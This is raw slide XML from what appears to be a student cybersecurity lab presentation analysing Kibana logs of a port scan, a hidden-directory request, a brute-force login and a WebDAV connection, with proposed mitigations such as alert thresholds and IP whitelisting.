                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t> browsed their system and found the flag I was looking for.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;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6" name="Google Shape;1146;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 name="Google Shape;1147;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19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C984AA2-7334-44F7-8A00-F562B13DDD45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6531272" y="2453667"/>
            <a:ext cx="2209819" cy="13076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1904-DB57-411F-B6A9-C2CEDE7A5E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B518EE-5413-4B76-B527-3547596B4FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8AC8BC8-A71E-42AA-A3B3-98E37C4DE373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B48F679-F5B6-4429-85C5-7C516D8E4CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25505AA3-E9D2-47AC-A383-8A1ECDAA6954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="-1"/>
            <a:ext cx="9156300" cy="5187029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="430738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pic>
        <p:nvPicPr>
          <p:cNvPr id="1153" name="Google Shape;1153;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4" name="Google Shape;1154;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5" name="Google Shape;1155;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1" name="Google Shape;1161;p65"/>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62" name="Google Shape;1162;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3" name="Google Shape;1163;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Include a screenshot of Kibana logs depicting the port scan. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="49110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What time did the port scan occur?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>How many packets were sent, and from which IP?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>What indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p65"/>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3" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDCF19E-E15B-4D6A-AE4F-6838E1BA12B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="309835" y="1467800"/>
            <a:ext cx="5715281" cy="3338116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FE2EAC-73F2-4FF5-80B9-9CBCA8656FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025116" y="1467800"/>
            <a:ext cx="3118884" cy="34488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1" name="Google Shape;1171;p66"/>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72" name="Google Shape;1172;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73" name="Google Shape;1173;p66"/>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Include a screenshot of Kibana logs depicting the request for the hidden directory. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>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What time did the request occur? How many requests were made?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested? What did they contain?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Google Shape;1175;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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC155844-2726-4B7A-86A5-E3534E7F5ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367349" y="1420534"/>
            <a:ext cx="5461951" cy="1589791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDD812D-4E43-4B83-953A-94966238495A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367347" y="3000964"/>
            <a:ext cx="5461951" cy="1457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE7C389-C636-4A00-A496-892036E5A52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829298" y="2561200"/>
            <a:ext cx="3086971" cy="2308866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A68D4F-211B-4B5B-951C-6B1697E750C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076453" y="1410119"/>
            <a:ext cx="2850821" cy="1574886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E11611-F9F9-458A-BE2D-1B215ABFBEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5990196" y="1204258"/>
            <a:ext cx="2926074" cy="1356942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB00D40A-4BFE-4D12-9110-558E261C8781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="227727" y="3041082"/>
            <a:ext cx="2848726" cy="1828984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284014C5-B7E4-47B4-B97F-E7E72938CD39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7371907" y="3409400"/>
            <a:ext cx="1569388" cy="13569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1" name="Google Shape;1181;p67"/>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82" name="Google Shape;1182;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83" name="Google Shape;1183;p67"/>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Include a screenshot of Kibana logs depicting the brute force attack.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>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How many requests were made in the attack?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>discovered the password?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1185" name="Google Shape;1185;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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FA0DD7-2316-4895-8367-B10DB05A366E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8482736" cy="2491879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CAC8898-786D-421F-A7C7-C84DB38D224A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3240541"/>
            <a:ext cx="8591550" cy="14382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A069-75BC-4E09-B0A2-ACE1D2A4F5C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16B9191-39C9-4D1D-B9BA-6C49D104E433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C714F66A-4462-4758-B923-6194C8CED173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="9144000" cy="5181345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64790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1" name="Google Shape;1191;p68"/>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92" name="Google Shape;1192;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3" name="Google Shape;1193;p68"/>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Add a screenshot of Kibana logs depicting the WebDAV connection.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>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How many requests were made to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;1195;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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032D85B2-92E2-44E8-9094-265A9EB41BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1421546"/>
            <a:ext cx="8409300" cy="2438038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F097D57-FC3A-4754-AE16-2FFEFA230236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3865887"/>
            <a:ext cx="6505575" cy="723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1200" name="Google Shape;1200;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1" name="Google Shape;1201;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2" name="Google Shape;1202;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Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;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9" name="Google Shape;1209;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port scans?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"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Set up an alert for Port 22 and Port 80 traffic certain level of traffic in within a specific period.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What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>- alarm fires when the level set for port 22 and 80 has a high level of traffic then normal.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;1210;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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="14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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="14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Disable Port 22</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="14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br>
            <a:r>
              <a:rPr lang="en-AU" sz="14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-Use white list access for Port 80  on the server to mitigate the vulnerability.</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6" name="Google Shape;1216;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7" name="Google Shape;1217;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unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Only allow authorized IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Have an alarm notify by email that an authorized IP is trying to gain access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Whitelist with IP address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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Tx/>
              <a:buChar char="-"/>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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>- Have an alarm that fires when incoming IP address is detected that is not authorized.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;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unwanted access?</a:t>
            </a:r>
